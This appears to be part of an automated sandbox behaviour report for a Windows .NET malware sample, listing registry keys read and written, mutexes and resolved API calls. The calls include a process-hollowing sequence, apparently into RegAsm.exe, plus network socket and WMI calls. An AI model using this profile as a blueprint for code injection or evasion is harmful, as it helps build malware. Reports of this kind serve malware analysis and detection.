HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ObjectName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\WerSvcGroup
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceManifest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceMain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ServiceTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceDllUnloadOnStop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\NoReflection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TraceFlags
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\NoReflection
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug\Debugger
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\CurrentType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\APPCRASH
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\APPCRASH
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\6FD5A890
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableInetUnknownAuth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\F8B50CC5

Write Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\RegAsm_RASAPI32
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegAsm_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegAsm_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegAsm_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegAsm_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegAsm_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegAsm_RASAPI32\FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\List of event-active namespaces
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/CIMV2\SCM Event Provider
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Type
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\Debug
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\Debug\ExceptionRecord
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Macromedia\FlashPlayerSAU\LastUpdateCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Macromedia\FlashPlayerSAU\CheckFrequency

Delete Keys

Nothing to display

Mutexes

Global\CLR_CASOFF_MUTEX
Global\.net clr networking
Global\425f44f6-6272-11e8-a5ab-0800274633c1
Local\MSCTF.Asm.MutexDefault1
Local\WERReportingForProcess2824
Global\505eb35d-6272-11e8-a5ab-0800274633c1

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
clr.dll.SetRuntimeInfo
clr.dll._CorExeMain
mscoree.dll.CreateConfigStream
mscoreei.dll.CreateConfigStream
kernel32.dll.GetNumaHighestNodeNumber
kernel32.dll.GetSystemWindowsDirectoryW
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddSIDToBoundaryDescriptor
kernel32.dll.CreateBoundaryDescriptorW
kernel32.dll.CreatePrivateNamespaceW
kernel32.dll.OpenPrivateNamespaceW
kernel32.dll.DeleteBoundaryDescriptor
kernel32.dll.WerRegisterRuntimeExceptionModule
kernel32.dll.RaiseException
mscoree.dll.#24
mscoreei.dll.#24
ntdll.dll.NtSetSystemInformation
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.GetNativeSystemInfo
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
clrjit.dll.sxsJitStartup
clrjit.dll.getJit
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcess
kernel32.dll.LocaleNameToLCID
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetUserPreferredUILanguages
nlssorting.dll.SortGetHandle
nlssorting.dll.SortCloseHandle
kernel32.dll.GetTempPathW
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
kernel32.dll.GetFullPathNameW
cryptsp.dll.CryptGetDefaultProviderW
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
kernel32.dll.SetThreadErrorMode
kernel32.dll.CreateFileW
kernel32.dll.GetFileType
kernel32.dll.WriteFile
kernel32.dll.GetFileAttributesExW
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.GetStdHandle
kernel32.dll.GetEnvironmentStrings
kernel32.dll.GetEnvironmentStringsW
kernel32.dll.FreeEnvironmentStringsW
kernel32.dll.GetACP
kernel32.dll.UnmapViewOfFile
kernel32.dll.CreateProcessW
kernel32.dll.DuplicateHandle
kernel32.dll.GetExitCodeProcess
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
kernel32.dll.DeleteFileW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
kernel32.dll.FindResourceA
kernel32.dll.SizeofResource
kernel32.dll.LoadResource
kernel32.dll.LockResource
gdiplus.dll.GdiplusStartup
kernel32.dll.IsProcessorFeaturePresent
user32.dll.GetWindowInfo
user32.dll.GetAncestor
user32.dll.GetMonitorInfoA
user32.dll.EnumDisplayMonitors
user32.dll.EnumDisplayDevicesA
gdi32.dll.ExtTextOutW
gdi32.dll.GdiIsMetaPrintDC
gdiplus.dll.GdipCreateBitmapFromStream
windowscodecs.dll.DllGetClassObject
kernel32.dll.WerRegisterMemoryBlock
gdiplus.dll.GdipImageForceValidation
gdiplus.dll.GdipGetImageRawFormat
gdiplus.dll.GdipGetImageWidth
gdiplus.dll.GdipGetImageHeight
gdiplus.dll.GdipBitmapGetPixel
shell32.dll.SHGetFolderPathW
kernel32.dll.CopyFileW
kernel32.dll.DeleteFileA
kernel32.dll.WideCharToMultiByte
kernel32.dll.LoadLibraryA
kernel32.dll.GetProcAddress
kernel32.dll.GetModuleHandleA
advapi32.dll.LookupPrivilegeValueW
advapi32.dll.AdjustTokenPrivileges
ntdll.dll.NtQuerySystemInformation
kernel32.dll.CreateProcessA
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.ReadProcessMemory
kernel32.dll.WriteProcessMemory
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.VirtualAllocEx
kernel32.dll.ResumeThread
ole32.dll.CoUninitialize
oleaut32.dll.#500
gdiplus.dll.GdipDisposeImage
cryptsp.dll.CryptReleaseContext
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
kernel32.dll.QueryActCtxW
advapi32.dll.EventUnregister
kernel32.dll.GetProcessPreferredUILanguages
kernel32.dll.GetUserDefaultUILanguage
version.dll.GetFileVersionInfoSizeA
version.dll.GetFileVersionInfoA
version.dll.VerQueryValueA
alink.dll.CreateALink
mscoree.dll.CLRCreateInstance
mscoreei.dll.CLRCreateInstance
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
clr.dll.DllGetClassObjectInternal
clr.dll.StrongNameTokenFromPublicKey
clr.dll.StrongNameFreeBuffer
clr.dll.CompareAssemblyIdentityWithConfig
clr.dll.CreateAssemblyConfigCookie
clr.dll.DestroyAssemblyConfigCookie
clr.dll.CreateAssemblyNameObject
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptDestroyKey
mscorpehost.dll.InitializeSxS
mscorpehost.dll.CreateICeeFileGen
mscorpehost.dll.DestroyICeeFileGen
ole32.dll.CoCreateGuid
diasymreader.dll.DllGetClassObject
rpcrt4.dll.UuidCreate
kernel32.dll.NlsGetCacheUpdateCount
ole32.dll.CreateStreamOnHGlobal
mscoree.dll.CorExitProcess
mscoreei.dll.CorExitProcess
kernel32.dll.InitializeCriticalSectionAndSpinCount
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
ntdll.dll.RtlUnwind
kernel32.dll.IsWow64Process
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
kernel32.dll.GetVersionExW
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
mscoree.dll.GetMetaDataInternalInterface
mscoreei.dll.GetMetaDataInternalInterface
mscorwks.dll.GetMetaDataInternalInterface
cryptsp.dll.CryptVerifySignatureA
mscorjit.dll.getJit
user32.dll.RegisterWindowMessageW
kernel32.dll.GetCurrentThread
kernel32.dll.GetCurrentThreadId
user32.dll.GetSystemMetrics
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
kernel32.dll.GetModuleHandleW
user32.dll.DefWindowProcW
gdi32.dll.GetStockObject
user32.dll.RegisterClassW
user32.dll.CreateWindowExW
user32.dll.SetWindowLongW
user32.dll.GetWindowLongW
user32.dll.CallWindowProcW
user32.dll.GetClientRect
user32.dll.GetWindowRect
user32.dll.GetParent
ole32.dll.IIDFromString
kernel32.dll.LocalFree
kernel32.dll.LocalAlloc
mscoree.dll.ND_RI4
mscoreei.dll.ND_RI4
mscoree.dll.ND_RU1
mscoreei.dll.ND_RU1
advapi32.dll.LsaClose
advapi32.dll.LsaFreeMemory
advapi32.dll.LsaOpenPolicy
advapi32.dll.LsaLookupSids
advapi32.dll.LsaLookupNames2
kernel32.dll.CreateEventW
ws2_32.dll.WSAStartup
ws2_32.dll.WSASocketW
ws2_32.dll.setsockopt
ws2_32.dll.WSAEventSelect
ws2_32.dll.ioctlsocket
ws2_32.dll.closesocket
kernel32.dll.SetErrorMode
mscoree.dll.ND_RI2
mscoreei.dll.ND_RI2
kernel32.dll.GetCurrentProcessId
kernel32.dll.GetComputerNameW
advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW
kernel32.dll.CreateFileMappingW
kernel32.dll.MapViewOfFile
kernel32.dll.VirtualQuery
kernel32.dll.ReleaseMutex
advapi32.dll.CreateWellKnownSid
kernel32.dll.CreateMutexW
kernel32.dll.WaitForSingleObject
kernel32.dll.OpenMutexW
kernel32.dll.OpenProcess
kernel32.dll.GetProcessTimes
ws2_32.dll.inet_addr
ws2_32.dll.bind
ws2_32.dll.listen
ws2_32.dll.getsockname
ws2_32.dll.accept
kernel32.dll.CreateIoCompletionPort
kernel32.dll.PostQueuedCompletionStatus
ntdll.dll.NtQueryInformationThread
ntdll.dll.NtGetCurrentProcessorNumber
kernel32.dll.SetEvent
uxtheme.dll.IsAppThemed
kernel32.dll.CreateActCtxA
user32.dll.AdjustWindowRectEx
shfolder.dll.SHGetFolderPathW
dwmapi.dll.DwmIsCompositionEnabled
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
gdi32.dll.CreateCompatibleDC
kernel32.dll.GetSystemDefaultLCID
gdi32.dll.GetObjectW
user32.dll.GetDC
kernel32.dll.FindAtomW
kernel32.dll.AddAtomW
mscoree.dll.LoadLibraryShim
gdiplus.dll.GdipCreateFontFromLogfontW
kernel32.dll.RegOpenKeyExW
kernel32.dll.RegQueryInfoKeyA
kernel32.dll.RegCloseKey
kernel32.dll.RegCreateKeyExW
kernel32.dll.RegQueryValueExW
kernel32.dll.RegEnumValueW
kernel32.dll.RegQueryInfoKeyW
gdiplus.dll.GdipGetFontUnit
gdiplus.dll.GdipGetFontSize
gdiplus.dll.GdipGetFontStyle
gdiplus.dll.GdipGetFamily
user32.dll.ReleaseDC
gdiplus.dll.GdipCreateFromHDC
gdiplus.dll.GdipGetDpiY
gdiplus.dll.GdipGetFontHeight
gdiplus.dll.GdipGetEmHeight
gdiplus.dll.GdipGetLineSpacing
gdiplus.dll.GdipDeleteGraphics
gdiplus.dll.GdipCreateFont
gdiplus.dll.GdipDeleteFont
gdiplus.dll.GdipGetLogFontW
mscoree.dll.ND_WU1
mscoreei.dll.ND_WU1
gdi32.dll.CreateFontIndirectW
gdi32.dll.SelectObject
gdi32.dll.GetTextMetricsW
gdi32.dll.GetTextExtentPoint32W
gdi32.dll.DeleteDC
user32.dll.GetWindowTextLengthW
user32.dll.GetWindowTextW
user32.dll.GetProcessWindowStation
user32.dll.GetUserObjectInformationA
kernel32.dll.SetConsoleCtrlHandler
user32.dll.GetClassInfoW
user32.dll.SetLayeredWindowAttributes
kernel32.dll.GetStartupInfoW
user32.dll.GetWindowPlacement
user32.dll.SendMessageW
user32.dll.GetSystemMenu
user32.dll.EnableMenuItem
gdi32.dll.GetDeviceCaps
user32.dll.CreateIconFromResourceEx
user32.dll.SetWindowPos
user32.dll.RedrawWindow
user32.dll.ShowWindow
bcrypt.dll.BCryptGetFipsAlgorithmMode
kernel32.dll.SwitchToThread
iphlpapi.dll.GetNetworkParams
dnsapi.dll.DnsQueryConfig
iphlpapi.dll.GetAdaptersAddresses
iphlpapi.dll.GetIpInterfaceEntry
iphlpapi.dll.GetBestInterfaceEx
iphlpapi.dll.GetAdaptersInfo
iphlpapi.dll.GetIfEntry
iphlpapi.dll.GetPerAdapterInfo
ws2_32.dll.gethostname
ws2_32.dll.getaddrinfo
ws2_32.dll.freeaddrinfo
rasapi32.dll.RasEnumConnectionsW
rtutils.dll.TraceRegisterExA
rtutils.dll.TracePrintfExA
sechost.dll.OpenSCManagerW
sechost.dll.OpenServiceW
sechost.dll.QueryServiceStatus
sechost.dll.CloseServiceHandle
ws2_32.dll.WSAIoctl
kernel32.dll.FormatMessageW
rasapi32.dll.RasConnectionNotificationW
advapi32.dll.RegOpenCurrentUser
advapi32.dll.RegNotifyChangeKeyValue
sechost.dll.NotifyServiceStatusChangeA
winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser
kernel32.dll.ResetEvent
ole32.dll.CoWaitForMultipleHandles
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
ole32.dll.NdrOleInitializeExtension
ole32.dll.CoGetClassObject
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoCreateInstance
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
ws2_32.dll.WSAConnect
ws2_32.dll.send
ws2_32.dll.recv
ws2_32.dll.shutdown
ole32.dll.CoCreateFreeThreadedMarshaler
ole32.dll.CoGetObjectContext
oleaut32.dll.#2
oleaut32.dll.#6
wminet_utils.dll.ResetSecurity
wminet_utils.dll.SetSecurity
wminet_utils.dll.BlessIWbemServices
wminet_utils.dll.BlessIWbemServicesObject
wminet_utils.dll.GetPropertyHandle
wminet_utils.dll.WritePropertyValue
wminet_utils.dll.Clone
wminet_utils.dll.VerifyClientKey
wminet_utils.dll.GetQualifierSet
wminet_utils.dll.Get
wminet_utils.dll.Put
wminet_utils.dll.Delete
wminet_utils.dll.GetNames
wminet_utils.dll.BeginEnumeration
wminet_utils.dll.Next
wminet_utils.dll.EndEnumeration
wminet_utils.dll.GetPropertyQualifierSet
wminet_utils.dll.GetObjectText
wminet_utils.dll.SpawnDerivedClass
wminet_utils.dll.SpawnInstance
wminet_utils.dll.CompareTo
wminet_utils.dll.GetPropertyOrigin
wminet_utils.dll.InheritsFrom
wminet_utils.dll.GetMethod
wminet_utils.dll.PutMethod
wminet_utils.dll.DeleteMethod
wminet_utils.dll.BeginMethodEnumeration
wminet_utils.dll.NextMethod
wminet_utils.dll.EndMethodEnumeration
wminet_utils.dll.GetMethodQualifierSet
wminet_utils.dll.GetMethodOrigin
wminet_utils.dll.QualifierSet_Get
wminet_utils.dll.QualifierSet_Put
wminet_utils.dll.QualifierSet_Delete
wminet_utils.dll.QualifierSet_GetNames
wminet_utils.dll.QualifierSet_BeginEnumeration
wminet_utils.dll.QualifierSet_Next
wminet_utils.dll.QualifierSet_EndEnumeration
wminet_utils.dll.GetCurrentApartmentType
wminet_utils.dll.GetDemultiplexedStub
wminet_utils.dll.CreateInstanceEnumWmi
wminet_utils.dll.CreateClassEnumWmi
wminet_utils.dll.ExecQueryWmi
wminet_utils.dll.ExecNotificationQueryWmi
wminet_utils.dll.PutInstanceWmi
wminet_utils.dll.PutClassWmi
wminet_utils.dll.CloneEnumWbemClassObject
wminet_utils.dll.ConnectServerWmi
kernel32.dll.GetThreadPreferredUILanguages
kernel32.dll.SetThreadPreferredUILanguages
kernel32.dll.GetSystemDefaultLocaleName
user32.dll.BeginPaint
gdiplus.dll.GdipCreateHalftonePalette
gdi32.dll.SelectPalette
